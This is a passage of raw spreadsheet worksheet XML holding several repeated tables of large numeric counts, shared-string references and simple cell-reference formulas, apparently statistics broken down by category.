        <v>0.99964198126606674</v>
      </c>
      <c r="N11" s="407">
        <f t="shared" si="2"/>
        <v>0.99964198126606674</v>
      </c>
      <c r="O11" s="1"/>
      <c r="P11" s="1"/>
    </row>
    <row r="12" spans="1:23" s="7" customFormat="1" ht="42.75" customHeight="1" thickTop="1" thickBot="1">
      <c r="A12" s="1"/>
      <c r="B12" s="1"/>
      <c r="C12" s="1"/>
      <c r="D12" s="1"/>
      <c r="E12" s="1"/>
      <c r="F12" s="1"/>
      <c r="G12" s="1"/>
      <c r="H12" s="1"/>
      <c r="I12" s="1"/>
      <c r="J12" s="1"/>
      <c r="K12" s="418"/>
      <c r="L12" s="418"/>
      <c r="M12" s="418"/>
      <c r="N12" s="418"/>
      <c r="O12" s="335"/>
      <c r="P12" s="335"/>
      <c r="Q12" s="335"/>
    </row>
    <row r="13" spans="1:23" s="7" customFormat="1" ht="15" customHeight="1">
      <c r="A13" s="1"/>
      <c r="B13" s="707" t="s">
        <v>2344</v>
      </c>
      <c r="C13" s="708"/>
      <c r="D13" s="708"/>
      <c r="E13" s="708"/>
      <c r="F13" s="708"/>
      <c r="G13" s="708"/>
      <c r="H13" s="708"/>
      <c r="I13" s="708"/>
      <c r="J13" s="708"/>
      <c r="K13" s="709" t="s">
        <v>680</v>
      </c>
      <c r="L13" s="710"/>
      <c r="M13" s="711" t="s">
        <v>681</v>
      </c>
      <c r="N13" s="712"/>
      <c r="O13" s="335"/>
      <c r="P13" s="1"/>
    </row>
    <row r="14" spans="1:23" s="7" customFormat="1" ht="30.75" customHeight="1">
      <c r="A14" s="619" t="s">
        <v>641</v>
      </c>
      <c r="B14" s="626" t="s">
        <v>0</v>
      </c>
      <c r="C14" s="421" t="s">
        <v>1</v>
      </c>
      <c r="D14" s="421" t="s">
        <v>2</v>
      </c>
      <c r="E14" s="421" t="s">
        <v>3</v>
      </c>
      <c r="F14" s="421" t="s">
        <v>1758</v>
      </c>
      <c r="G14" s="421" t="s">
        <v>1759</v>
      </c>
      <c r="H14" s="421" t="s">
        <v>1760</v>
      </c>
      <c r="I14" s="421" t="s">
        <v>1761</v>
      </c>
      <c r="J14" s="422" t="s">
        <v>1762</v>
      </c>
      <c r="K14" s="416" t="s">
        <v>2345</v>
      </c>
      <c r="L14" s="417" t="s">
        <v>2436</v>
      </c>
      <c r="M14" s="419" t="s">
        <v>2345</v>
      </c>
      <c r="N14" s="627" t="s">
        <v>2437</v>
      </c>
      <c r="O14" s="335"/>
      <c r="P14" s="1"/>
    </row>
    <row r="15" spans="1:23" s="7" customFormat="1" ht="15" customHeight="1">
      <c r="A15" s="620" t="s">
        <v>286</v>
      </c>
      <c r="B15" s="705">
        <f>B3</f>
        <v>78694206</v>
      </c>
      <c r="C15" s="697"/>
      <c r="D15" s="697"/>
      <c r="E15" s="697"/>
      <c r="F15" s="697"/>
      <c r="G15" s="697"/>
      <c r="H15" s="697"/>
      <c r="I15" s="697"/>
      <c r="J15" s="697"/>
      <c r="K15" s="697"/>
      <c r="L15" s="697"/>
      <c r="M15" s="697"/>
      <c r="N15" s="706"/>
      <c r="O15" s="1"/>
      <c r="P15" s="1"/>
      <c r="Q15" s="618"/>
    </row>
    <row r="16" spans="1:23" s="7" customFormat="1" ht="15" customHeight="1">
      <c r="A16" s="621" t="s">
        <v>293</v>
      </c>
      <c r="B16" s="628">
        <v>9778069</v>
      </c>
      <c r="C16" s="392">
        <v>5500009</v>
      </c>
      <c r="D16" s="392">
        <v>15278078</v>
      </c>
      <c r="E16" s="392">
        <v>15309135</v>
      </c>
      <c r="F16" s="392">
        <v>14539188</v>
      </c>
      <c r="G16" s="392">
        <v>29848323</v>
      </c>
      <c r="H16" s="392">
        <v>6990</v>
      </c>
      <c r="I16" s="392">
        <v>8738223</v>
      </c>
      <c r="J16" s="392">
        <v>24009324</v>
      </c>
      <c r="K16" s="408">
        <v>4424853</v>
      </c>
      <c r="L16" s="403">
        <v>25932651</v>
      </c>
      <c r="M16" s="408">
        <v>24194</v>
      </c>
      <c r="N16" s="629">
        <v>54938</v>
      </c>
      <c r="O16" s="1"/>
      <c r="P16" s="1"/>
      <c r="Q16" s="618"/>
    </row>
    <row r="17" spans="1:17" s="7" customFormat="1" ht="24.75" customHeight="1">
      <c r="A17" s="621" t="s">
        <v>4457</v>
      </c>
      <c r="B17" s="628">
        <v>8620288</v>
      </c>
      <c r="C17" s="4">
        <v>5136879</v>
      </c>
      <c r="D17" s="4">
        <v>13757167</v>
      </c>
      <c r="E17" s="4">
        <v>13128811</v>
      </c>
      <c r="F17" s="4">
        <v>13066562</v>
      </c>
      <c r="G17" s="4">
        <v>26195373</v>
      </c>
      <c r="H17" s="4">
        <v>6420</v>
      </c>
      <c r="I17" s="4">
        <v>7505544</v>
      </c>
      <c r="J17" s="286">
        <v>21256304</v>
      </c>
      <c r="K17" s="408">
        <v>4403661</v>
      </c>
      <c r="L17" s="403">
        <v>25655131</v>
      </c>
      <c r="M17" s="408">
        <v>22009</v>
      </c>
      <c r="N17" s="629">
        <v>49743</v>
      </c>
      <c r="O17" s="1"/>
      <c r="P17" s="1"/>
      <c r="Q17" s="618"/>
    </row>
    <row r="18" spans="1:17" s="7" customFormat="1" ht="23.25" customHeight="1">
      <c r="A18" s="622" t="s">
        <v>2254</v>
      </c>
      <c r="B18" s="628">
        <v>22</v>
      </c>
      <c r="C18" s="4">
        <v>71</v>
      </c>
      <c r="D18" s="4">
        <v>93</v>
      </c>
      <c r="E18" s="4">
        <v>214</v>
      </c>
      <c r="F18" s="4">
        <v>229</v>
      </c>
      <c r="G18" s="4">
        <v>443</v>
      </c>
      <c r="H18" s="4">
        <v>2</v>
      </c>
      <c r="I18" s="4">
        <v>63</v>
      </c>
      <c r="J18" s="286">
        <v>154</v>
      </c>
      <c r="K18" s="408">
        <v>26</v>
      </c>
      <c r="L18" s="403">
        <v>26</v>
      </c>
      <c r="M18" s="408">
        <v>7</v>
      </c>
      <c r="N18" s="629">
        <v>7</v>
      </c>
      <c r="O18" s="1"/>
      <c r="P18" s="1"/>
      <c r="Q18" s="618"/>
    </row>
    <row r="19" spans="1:17" s="7" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A19" s="623" t="s">
        <v>730</v>
      </c>
      <c r="B19" s="630" t="s">
        <v>4665</v>
      </c>
      <c r="C19" s="12" t="s">
        <v>4665</v>
      </c>
      <c r="D19" s="12" t="s">
        <v>4665</v>
      </c>
      <c r="E19" s="12" t="s">
        <v>4665</v>
      </c>
      <c r="F19" s="12" t="s">
        <v>4665</v>
      </c>
      <c r="G19" s="12" t="s">
        <v>4665</v>
      </c>
      <c r="H19" s="12" t="s">
        <v>4665</v>
      </c>
      <c r="I19" s="12" t="s">
        <v>4665</v>
      </c>
      <c r="J19" s="316" t="s">
        <v>4665</v>
      </c>
      <c r="K19" s="409" t="s">
        <v>4665</v>
      </c>
      <c r="L19" s="413">
        <v>134</v>
      </c>
      <c r="M19" s="409" t="s">
        <v>4665</v>
      </c>
      <c r="N19" s="631">
        <v>9</v>
      </c>
      <c r="O19" s="1"/>
      <c r="P19" s="1"/>
      <c r="Q19" s="618"/>
    </row>
    <row r="20" spans="1:17" s="7" customFormat="1" ht="15" customHeight="1" thickTop="1">
      <c r="A20" s="624" t="s">
        <v>2343</v>
      </c>
      <c r="B20" s="632">
        <v>3391362</v>
      </c>
      <c r="C20" s="317">
        <v>4719941</v>
      </c>
      <c r="D20" s="317">
        <v>7276338</v>
      </c>
      <c r="E20" s="317">
        <v>6879262</v>
      </c>
      <c r="F20" s="317">
        <v>6115454</v>
      </c>
      <c r="G20" s="317">
        <v>9478500</v>
      </c>
      <c r="H20" s="317">
        <v>6398</v>
      </c>
      <c r="I20" s="317">
        <v>7470907</v>
      </c>
      <c r="J20" s="318">
        <v>10855081</v>
      </c>
      <c r="K20" s="410">
        <v>4403121</v>
      </c>
      <c r="L20" s="414">
        <v>18609931</v>
      </c>
      <c r="M20" s="410">
        <v>21995</v>
      </c>
      <c r="N20" s="633">
        <v>27763</v>
      </c>
      <c r="O20" s="1"/>
      <c r="P20" s="1"/>
      <c r="Q20" s="618"/>
    </row>
    <row r="21" spans="1:17" s="7" customFormat="1" ht="15" customHeight="1">
      <c r="A21" s="622" t="s">
        <v>2339</v>
      </c>
      <c r="B21" s="628">
        <v>75302844</v>
      </c>
      <c r="C21" s="4">
        <v>73974265</v>
      </c>
      <c r="D21" s="4">
        <v>71417868</v>
      </c>
      <c r="E21" s="599">
        <v>71814944</v>
      </c>
      <c r="F21" s="599">
        <v>72578752</v>
      </c>
      <c r="G21" s="599">
        <v>69215706</v>
      </c>
      <c r="H21" s="4">
        <v>78687808</v>
      </c>
      <c r="I21" s="4">
        <v>71223299</v>
      </c>
      <c r="J21" s="286">
        <v>67839125</v>
      </c>
      <c r="K21" s="408">
        <v>74291085</v>
      </c>
      <c r="L21" s="403">
        <v>60084275</v>
      </c>
      <c r="M21" s="408">
        <v>78672211</v>
      </c>
      <c r="N21" s="629">
        <v>78666443</v>
      </c>
      <c r="O21" s="1"/>
      <c r="P21" s="1"/>
      <c r="Q21" s="618"/>
    </row>
    <row r="22" spans="1:17" s="7" customFormat="1" ht="15" customHeight="1">
      <c r="A22" s="622" t="s">
        <v>292</v>
      </c>
      <c r="B22" s="634" t="s">
        <v>4674</v>
      </c>
      <c r="C22" s="27" t="s">
        <v>4675</v>
      </c>
      <c r="D22" s="27" t="s">
        <v>4676</v>
      </c>
      <c r="E22" s="27" t="s">
        <v>4677</v>
      </c>
      <c r="F22" s="27" t="s">
        <v>4678</v>
      </c>
      <c r="G22" s="27" t="s">
        <v>4679</v>
      </c>
      <c r="H22" s="27" t="s">
        <v>4680</v>
      </c>
      <c r="I22" s="27" t="s">
        <v>4681</v>
      </c>
      <c r="J22" s="293" t="s">
        <v>4682</v>
      </c>
      <c r="K22" s="411" t="s">
        <v>4672</v>
      </c>
      <c r="L22" s="415" t="s">
        <v>4666</v>
      </c>
      <c r="M22" s="411" t="s">
        <v>4667</v>
      </c>
      <c r="N22" s="635" t="s">
        <v>4668</v>
      </c>
      <c r="O22" s="1"/>
      <c r="P22" s="1"/>
      <c r="Q22" s="618"/>
    </row>
    <row r="23" spans="1:17" s="7" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A23" s="625" t="s">
        <v>637</v>
      </c>
      <c r="B23" s="636" t="s">
        <v>4683</v>
      </c>
      <c r="C23" s="637" t="s">
        <v>4684</v>
      </c>
      <c r="D23" s="637" t="s">
        <v>4685</v>
      </c>
      <c r="E23" s="637" t="s">
        <v>4686</v>
      </c>
      <c r="F23" s="637" t="s">
        <v>4687</v>
      </c>
      <c r="G23" s="637" t="s">
        <v>4688</v>
      </c>
      <c r="H23" s="637" t="s">
        <v>4689</v>
      </c>
      <c r="I23" s="637" t="s">
        <v>4690</v>
      </c>
      <c r="J23" s="638" t="s">
        <v>4691</v>
      </c>
      <c r="K23" s="639" t="s">
        <v>4673</v>
      </c>
      <c r="L23" s="638" t="s">
        <v>4669</v>
      </c>
      <c r="M23" s="639" t="s">
        <v>4670</v>
      </c>
      <c r="N23" s="640" t="s">
        <v>4671</v>
      </c>
      <c r="O23" s="1"/>
      <c r="P23" s="1"/>
      <c r="Q23" s="618"/>
    </row>
    <row r="24" spans="1:17" s="7" customFormat="1" ht="34.5" customHeight="1" thickTop="1">
      <c r="A24" s="1"/>
      <c r="B24" s="1"/>
      <c r="C24" s="1"/>
      <c r="D24" s="1"/>
      <c r="E24" s="1"/>
      <c r="F24" s="1"/>
      <c r="G24" s="1"/>
      <c r="H24" s="1"/>
      <c r="I24" s="1"/>
      <c r="J24" s="1"/>
      <c r="K24" s="1"/>
      <c r="L24" s="1"/>
      <c r="M24" s="1"/>
      <c r="N24" s="1"/>
      <c r="O24" s="1"/>
      <c r="P24" s="1"/>
      <c r="Q24" s="618"/>
    </row>
    <row r="25" spans="1:17" s="7" customFormat="1" ht="15" customHeight="1">
      <c r="A25" s="1"/>
      <c r="B25" s="699" t="s">
        <v>2346</v>
      </c>
      <c r="C25" s="700"/>
      <c r="D25" s="700"/>
      <c r="E25" s="700"/>
      <c r="F25" s="700"/>
      <c r="G25" s="700"/>
      <c r="H25" s="700"/>
      <c r="I25" s="700"/>
      <c r="J25" s="700"/>
      <c r="K25" s="701" t="s">
        <v>680</v>
      </c>
      <c r="L25" s="702"/>
      <c r="M25" s="703" t="s">
        <v>681</v>
      </c>
      <c r="N25" s="704"/>
      <c r="O25" s="335"/>
      <c r="P25" s="1"/>
    </row>
    <row r="26" spans="1:17" s="7" customFormat="1" ht="30.75" customHeight="1">
      <c r="A26" s="424" t="s">
        <v>641</v>
      </c>
      <c r="B26" s="423" t="s">
        <v>0</v>
      </c>
      <c r="C26" s="421" t="s">
        <v>1</v>
      </c>
      <c r="D26" s="421" t="s">
        <v>2</v>
      </c>
      <c r="E26" s="421" t="s">
        <v>3</v>
      </c>
      <c r="F26" s="421" t="s">
        <v>1758</v>
      </c>
      <c r="G26" s="421" t="s">
        <v>1759</v>
      </c>
      <c r="H26" s="421" t="s">
        <v>1760</v>
      </c>
      <c r="I26" s="421" t="s">
        <v>1761</v>
      </c>
      <c r="J26" s="422" t="s">
        <v>1762</v>
      </c>
      <c r="K26" s="416" t="s">
        <v>2347</v>
      </c>
      <c r="L26" s="417" t="s">
        <v>2438</v>
      </c>
      <c r="M26" s="419" t="s">
        <v>2347</v>
      </c>
      <c r="N26" s="420" t="s">
        <v>2439</v>
      </c>
      <c r="O26" s="335"/>
      <c r="P26" s="1"/>
    </row>
    <row r="27" spans="1:17" s="7" customFormat="1" ht="15" customHeight="1">
      <c r="A27" s="425" t="s">
        <v>286</v>
      </c>
      <c r="B27" s="697">
        <f>B15</f>
        <v>78694206</v>
      </c>
      <c r="C27" s="697"/>
      <c r="D27" s="697"/>
      <c r="E27" s="697"/>
      <c r="F27" s="697"/>
      <c r="G27" s="697"/>
      <c r="H27" s="697"/>
      <c r="I27" s="697"/>
      <c r="J27" s="697"/>
      <c r="K27" s="697"/>
      <c r="L27" s="697"/>
      <c r="M27" s="697"/>
      <c r="N27" s="698"/>
      <c r="O27" s="1"/>
      <c r="P27" s="1"/>
    </row>
    <row r="28" spans="1:17" s="7" customFormat="1" ht="15" customHeight="1">
      <c r="A28" s="426" t="s">
        <v>293</v>
      </c>
      <c r="B28" s="392">
        <v>2858397</v>
      </c>
      <c r="C28" s="392">
        <v>385457</v>
      </c>
      <c r="D28" s="392">
        <v>3243854</v>
      </c>
      <c r="E28" s="392">
        <v>7886066</v>
      </c>
      <c r="F28" s="392">
        <v>4188364</v>
      </c>
      <c r="G28" s="392">
        <v>12074430</v>
      </c>
      <c r="H28" s="392">
        <v>6990</v>
      </c>
      <c r="I28" s="392">
        <v>4692620</v>
      </c>
      <c r="J28" s="392">
        <v>7929497</v>
      </c>
      <c r="K28" s="408">
        <v>4417024</v>
      </c>
      <c r="L28" s="403">
        <v>25529814</v>
      </c>
      <c r="M28" s="408">
        <v>24182</v>
      </c>
      <c r="N28" s="403">
        <v>53560</v>
      </c>
      <c r="O28" s="1"/>
      <c r="P28" s="1"/>
    </row>
    <row r="29" spans="1:17" s="7" customFormat="1" ht="24.75" customHeight="1">
      <c r="A29" s="426" t="s">
        <v>4457</v>
      </c>
      <c r="B29" s="392">
        <v>1738549</v>
      </c>
      <c r="C29" s="4">
        <v>381283</v>
      </c>
      <c r="D29" s="4">
        <v>2119832</v>
      </c>
      <c r="E29" s="4">
        <v>6020530</v>
      </c>
      <c r="F29" s="4">
        <v>3299324</v>
      </c>
      <c r="G29" s="4">
        <v>9319854</v>
      </c>
      <c r="H29" s="4">
        <v>6420</v>
      </c>
      <c r="I29" s="4">
        <v>3932063</v>
      </c>
      <c r="J29" s="286">
        <v>6045488</v>
      </c>
      <c r="K29" s="408">
        <v>4396049</v>
      </c>
      <c r="L29" s="403">
        <v>25295028</v>
      </c>
      <c r="M29" s="408">
        <v>21997</v>
      </c>
      <c r="N29" s="403">
        <v>48376</v>
      </c>
      <c r="O29" s="1"/>
      <c r="P29" s="1"/>
    </row>
    <row r="30" spans="1:17" s="7" customFormat="1" ht="24.75" customHeight="1">
      <c r="A30" s="427" t="s">
        <v>2254</v>
      </c>
      <c r="B30" s="392">
        <v>15</v>
      </c>
      <c r="C30" s="4">
        <v>45</v>
      </c>
      <c r="D30" s="4">
        <v>60</v>
      </c>
      <c r="E30" s="4">
        <v>155</v>
      </c>
      <c r="F30" s="4">
        <v>160</v>
      </c>
      <c r="G30" s="4">
        <v>315</v>
      </c>
      <c r="H30" s="4">
        <v>2</v>
      </c>
      <c r="I30" s="4">
        <v>39</v>
      </c>
      <c r="J30" s="286">
        <v>97</v>
      </c>
      <c r="K30" s="408">
        <v>12</v>
      </c>
      <c r="L30" s="403">
        <v>12</v>
      </c>
      <c r="M30" s="408">
        <v>6</v>
      </c>
      <c r="N30" s="403">
        <v>6</v>
      </c>
      <c r="O30" s="1"/>
      <c r="P30" s="1"/>
    </row>
    <row r="31" spans="1:17" s="7" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A31" s="428" t="s">
        <v>730</v>
      </c>
      <c r="B31" s="322" t="s">
        <v>4665</v>
      </c>
      <c r="C31" s="12" t="s">
        <v>4665</v>
      </c>
      <c r="D31" s="12" t="s">
        <v>4665</v>
      </c>
      <c r="E31" s="12" t="s">
        <v>4665</v>
      </c>
      <c r="F31" s="12" t="s">
        <v>4665</v>
      </c>
      <c r="G31" s="12" t="s">
        <v>4665</v>
      </c>
      <c r="H31" s="12" t="s">
        <v>4665</v>
      </c>
      <c r="I31" s="12" t="s">
        <v>4665</v>
      </c>
      <c r="J31" s="316" t="s">
        <v>4665</v>
      </c>
      <c r="K31" s="409" t="s">
        <v>4665</v>
      </c>
      <c r="L31" s="413">
        <v>121</v>
      </c>
      <c r="M31" s="409" t="s">
        <v>4665</v>
      </c>
      <c r="N31" s="413">
        <v>6</v>
      </c>
      <c r="O31" s="1"/>
      <c r="P31" s="1"/>
    </row>
    <row r="32" spans="1:17" s="7" customFormat="1" ht="15" customHeight="1" thickTop="1">
      <c r="A32" s="429" t="s">
        <v>2343</v>
      </c>
      <c r="B32" s="319">
        <v>1686398</v>
      </c>
      <c r="C32" s="317">
        <v>204091</v>
      </c>
      <c r="D32" s="317">
        <v>1724606</v>
      </c>
      <c r="E32" s="317">
        <v>3895907</v>
      </c>
      <c r="F32" s="317">
        <v>3012278</v>
      </c>
      <c r="G32" s="317">
        <v>5822763</v>
      </c>
      <c r="H32" s="317">
        <v>6398</v>
      </c>
      <c r="I32" s="317">
        <v>3922641</v>
      </c>
      <c r="J32" s="318">
        <v>5306206</v>
      </c>
      <c r="K32" s="410">
        <v>4395669</v>
      </c>
      <c r="L32" s="414">
        <v>18279194</v>
      </c>
      <c r="M32" s="410">
        <v>21983</v>
      </c>
      <c r="N32" s="414">
        <v>26434</v>
      </c>
      <c r="O32" s="1"/>
      <c r="P32" s="1"/>
    </row>
    <row r="33" spans="1:16" s="7" customFormat="1" ht="15" customHeight="1">
      <c r="A33" s="427" t="s">
        <v>2339</v>
      </c>
      <c r="B33" s="392">
        <v>77007808</v>
      </c>
      <c r="C33" s="4">
        <v>78490115</v>
      </c>
      <c r="D33" s="4">
        <v>76969600</v>
      </c>
      <c r="E33" s="4">
        <v>74798299</v>
      </c>
      <c r="F33" s="4">
        <v>75681928</v>
      </c>
      <c r="G33" s="4">
        <v>72871443</v>
      </c>
      <c r="H33" s="4">
        <v>78687808</v>
      </c>
      <c r="I33" s="4">
        <v>74771565</v>
      </c>
      <c r="J33" s="286">
        <v>73388000</v>
      </c>
      <c r="K33" s="408">
        <v>74298537</v>
      </c>
      <c r="L33" s="403">
        <v>60415012</v>
      </c>
      <c r="M33" s="408">
        <v>78672223</v>
      </c>
      <c r="N33" s="403">
        <v>78667772</v>
      </c>
      <c r="O33" s="1"/>
      <c r="P33" s="1"/>
    </row>
    <row r="34" spans="1:16" s="7" customFormat="1" ht="15" customHeight="1">
      <c r="A34" s="427" t="s">
        <v>292</v>
      </c>
      <c r="B34" s="294" t="s">
        <v>4692</v>
      </c>
      <c r="C34" s="27" t="s">
        <v>4693</v>
      </c>
      <c r="D34" s="27" t="s">
        <v>4694</v>
      </c>
      <c r="E34" s="27" t="s">
        <v>4695</v>
      </c>
      <c r="F34" s="27" t="s">
        <v>4696</v>
      </c>
      <c r="G34" s="27" t="s">
        <v>4697</v>
      </c>
      <c r="H34" s="27" t="s">
        <v>4680</v>
      </c>
      <c r="I34" s="27" t="s">
        <v>4698</v>
      </c>
      <c r="J34" s="293" t="s">
        <v>4699</v>
      </c>
      <c r="K34" s="411" t="s">
        <v>4700</v>
      </c>
      <c r="L34" s="415" t="s">
        <v>4701</v>
      </c>
      <c r="M34" s="411" t="s">
        <v>4667</v>
      </c>
      <c r="N34" s="415" t="s">
        <v>4702</v>
      </c>
      <c r="O34" s="1"/>
      <c r="P34" s="1"/>
    </row>
    <row r="35" spans="1:16" s="7" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A35" s="430" t="s">
        <v>637</v>
      </c>
      <c r="B35" s="321" t="s">
        <v>4703</v>
      </c>
      <c r="C35" s="320" t="s">
        <v>4704</v>
      </c>
      <c r="D35" s="320" t="s">
        <v>4705</v>
      </c>
      <c r="E35" s="320" t="s">
        <v>4706</v>
      </c>
      <c r="F35" s="320" t="s">
        <v>4707</v>
      </c>
      <c r="G35" s="320" t="s">
        <v>4708</v>
      </c>
      <c r="H35" s="320" t="s">
        <v>4689</v>
      </c>
      <c r="I35" s="320" t="s">
        <v>4709</v>
      </c>
      <c r="J35" s="407" t="s">
        <v>4710</v>
      </c>
      <c r="K35" s="431" t="s">
        <v>4711</v>
      </c>
      <c r="L35" s="407" t="s">
        <v>4712</v>
      </c>
      <c r="M35" s="432" t="s">
        <v>4670</v>
      </c>
      <c r="N35" s="407" t="s">
        <v>4713</v>
      </c>
      <c r="O35" s="1"/>
      <c r="P35" s="1"/>
    </row>
    <row r="36" spans="1:16" s="7" customFormat="1" ht="30.2" customHeight="1" thickTop="1">
      <c r="A36" s="1"/>
      <c r="B36" s="1"/>
      <c r="C36" s="1"/>
      <c r="D36" s="1"/>
      <c r="E36" s="1"/>
      <c r="F36" s="1"/>
      <c r="G36" s="1"/>
      <c r="H36" s="1"/>
      <c r="I36" s="1"/>
      <c r="J36" s="1"/>
      <c r="K36" s="1"/>
      <c r="L36" s="1"/>
      <c r="M36" s="1"/>
      <c r="N36" s="1"/>
      <c r="O36" s="1"/>
      <c r="P36" s="1"/>
    </row>
    <row r="37" spans="1:16" s="7" customFormat="1" ht="15" customHeight="1">
      <c r="A37" s="1"/>
      <c r="B37" s="699" t="s">
        <v>2348</v>
      </c>
      <c r="C37" s="700"/>
      <c r="D37" s="700"/>
      <c r="E37" s="700"/>
      <c r="F37" s="700"/>
      <c r="G37" s="700"/>
      <c r="H37" s="700"/>
      <c r="I37" s="700"/>
      <c r="J37" s="700"/>
      <c r="K37" s="701" t="s">
        <v>680</v>
      </c>
      <c r="L37" s="702"/>
      <c r="M37" s="703" t="s">
        <v>681</v>
      </c>
      <c r="N37" s="704"/>
      <c r="O37" s="335"/>
      <c r="P37" s="1"/>
    </row>
    <row r="38" spans="1:16" s="7" customFormat="1" ht="30.75" customHeight="1">
      <c r="A38" s="424" t="s">
        <v>641</v>
      </c>
      <c r="B38" s="423" t="s">
        <v>0</v>
      </c>
      <c r="C38" s="421" t="s">
        <v>1</v>
      </c>
      <c r="D38" s="421" t="s">
        <v>2</v>
      </c>
      <c r="E38" s="421" t="s">
        <v>3</v>
      </c>
      <c r="F38" s="421" t="s">
        <v>1758</v>
      </c>
      <c r="G38" s="421" t="s">
        <v>1759</v>
      </c>
      <c r="H38" s="421" t="s">
        <v>1760</v>
      </c>
      <c r="I38" s="421" t="s">
        <v>1761</v>
      </c>
      <c r="J38" s="422" t="s">
        <v>1762</v>
      </c>
      <c r="K38" s="416" t="s">
        <v>2349</v>
      </c>
      <c r="L38" s="417" t="s">
        <v>2440</v>
      </c>
      <c r="M38" s="419" t="s">
        <v>2349</v>
      </c>
      <c r="N38" s="420" t="s">
        <v>2441</v>
      </c>
      <c r="O38" s="335"/>
      <c r="P38" s="1"/>
    </row>
    <row r="39" spans="1:16" s="7" customFormat="1" ht="15" customHeight="1">
      <c r="A39" s="425" t="s">
        <v>286</v>
      </c>
      <c r="B39" s="697">
        <f>B27</f>
        <v>78694206</v>
      </c>
      <c r="C39" s="697"/>
      <c r="D39" s="697"/>
      <c r="E39" s="697"/>
      <c r="F39" s="697"/>
      <c r="G39" s="697"/>
      <c r="H39" s="697"/>
      <c r="I39" s="697"/>
      <c r="J39" s="697"/>
      <c r="K39" s="697"/>
      <c r="L39" s="697"/>
      <c r="M39" s="697"/>
      <c r="N39" s="698"/>
      <c r="O39" s="1"/>
      <c r="P39" s="1"/>
    </row>
    <row r="40" spans="1:16" s="7" customFormat="1" ht="15" customHeight="1">
      <c r="A40" s="426" t="s">
        <v>293</v>
      </c>
      <c r="B40" s="392">
        <v>6987</v>
      </c>
      <c r="C40" s="4">
        <v>338711</v>
      </c>
      <c r="D40" s="4">
        <v>345698</v>
      </c>
      <c r="E40" s="4">
        <v>2527690</v>
      </c>
      <c r="F40" s="4">
        <v>673827</v>
      </c>
      <c r="G40" s="4">
        <v>3201517</v>
      </c>
      <c r="H40" s="4">
        <v>6990</v>
      </c>
      <c r="I40" s="4">
        <v>21553</v>
      </c>
      <c r="J40" s="286">
        <v>360274</v>
      </c>
      <c r="K40" s="408">
        <v>4244616</v>
      </c>
      <c r="L40" s="403">
        <v>22445972</v>
      </c>
      <c r="M40" s="408">
        <v>28</v>
      </c>
      <c r="N40" s="403">
        <v>27691</v>
      </c>
      <c r="O40" s="1"/>
      <c r="P40" s="1"/>
    </row>
    <row r="41" spans="1:16" s="7" customFormat="1" ht="24.75" customHeight="1">
      <c r="A41" s="426" t="s">
        <v>4457</v>
      </c>
      <c r="B41" s="392">
        <v>6417</v>
      </c>
      <c r="C41" s="4">
        <v>338311</v>
      </c>
      <c r="D41" s="4">
        <v>344728</v>
      </c>
      <c r="E41" s="4">
        <v>2445673</v>
      </c>
      <c r="F41" s="4">
        <v>571742</v>
      </c>
      <c r="G41" s="4">
        <v>3017415</v>
      </c>
      <c r="H41" s="4">
        <v>6420</v>
      </c>
      <c r="I41" s="4">
        <v>14558</v>
      </c>
      <c r="J41" s="286">
        <v>352879</v>
      </c>
      <c r="K41" s="408">
        <v>4224161</v>
      </c>
      <c r="L41" s="403">
        <v>22211706</v>
      </c>
      <c r="M41" s="408">
        <v>28</v>
      </c>
      <c r="N41" s="403">
        <v>24694</v>
      </c>
      <c r="O41" s="1"/>
      <c r="P41" s="1"/>
    </row>
    <row r="42" spans="1:16" s="7" customFormat="1" ht="26.45" customHeight="1">
      <c r="A42" s="427" t="s">
        <v>2254</v>
      </c>
      <c r="B42" s="392">
        <v>3</v>
      </c>
      <c r="C42" s="4">
        <v>13</v>
      </c>
      <c r="D42" s="4">
        <v>16</v>
      </c>
      <c r="E42" s="4">
        <v>79</v>
      </c>
      <c r="F42" s="4">
        <v>42</v>
      </c>
      <c r="G42" s="4">
        <v>121</v>
      </c>
      <c r="H42" s="4">
        <v>2</v>
      </c>
      <c r="I42" s="4">
        <v>10</v>
      </c>
      <c r="J42" s="286">
        <v>24</v>
      </c>
      <c r="K42" s="408">
        <v>10</v>
      </c>
      <c r="L42" s="403">
        <v>10</v>
      </c>
      <c r="M42" s="408">
        <v>2</v>
      </c>
      <c r="N42" s="403">
        <v>2</v>
      </c>
      <c r="O42" s="1"/>
      <c r="P42" s="1"/>
    </row>
    <row r="43" spans="1:16" s="7" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A43" s="428" t="s">
        <v>730</v>
      </c>
      <c r="B43" s="322" t="s">
        <v>4665</v>
      </c>
      <c r="C43" s="12" t="s">
        <v>4665</v>
      </c>
      <c r="D43" s="12" t="s">
        <v>4665</v>
      </c>
      <c r="E43" s="12" t="s">
        <v>4665</v>
      </c>
      <c r="F43" s="12" t="s">
        <v>4665</v>
      </c>
      <c r="G43" s="12" t="s">
        <v>4665</v>
      </c>
      <c r="H43" s="12" t="s">
        <v>4665</v>
      </c>
      <c r="I43" s="12" t="s">
        <v>4665</v>
      </c>
      <c r="J43" s="316" t="s">
        <v>4665</v>
      </c>
      <c r="K43" s="409" t="s">
        <v>4665</v>
      </c>
      <c r="L43" s="413">
        <v>103</v>
      </c>
      <c r="M43" s="409" t="s">
        <v>4665</v>
      </c>
      <c r="N43" s="413">
        <v>2</v>
      </c>
      <c r="O43" s="1"/>
      <c r="P43" s="1"/>
    </row>
    <row r="44" spans="1:16" s="7" customFormat="1" ht="15" customHeight="1" thickTop="1">
      <c r="A44" s="429" t="s">
        <v>2343</v>
      </c>
      <c r="B44" s="319">
        <v>6395</v>
      </c>
      <c r="C44" s="317">
        <v>169036</v>
      </c>
      <c r="D44" s="317">
        <v>175400</v>
      </c>
      <c r="E44" s="317">
        <v>1067860</v>
      </c>
      <c r="F44" s="317">
        <v>421616</v>
      </c>
      <c r="G44" s="317">
        <v>1243621</v>
      </c>
      <c r="H44" s="317">
        <v>6398</v>
      </c>
      <c r="I44" s="317">
        <v>14498</v>
      </c>
      <c r="J44" s="318">
        <v>182455</v>
      </c>
      <c r="K44" s="410">
        <v>4224014</v>
      </c>
      <c r="L44" s="414">
        <v>17178374</v>
      </c>
      <c r="M44" s="410">
        <v>28</v>
      </c>
      <c r="N44" s="414">
        <v>24694</v>
      </c>
      <c r="O44" s="1"/>
      <c r="P44" s="1"/>
    </row>
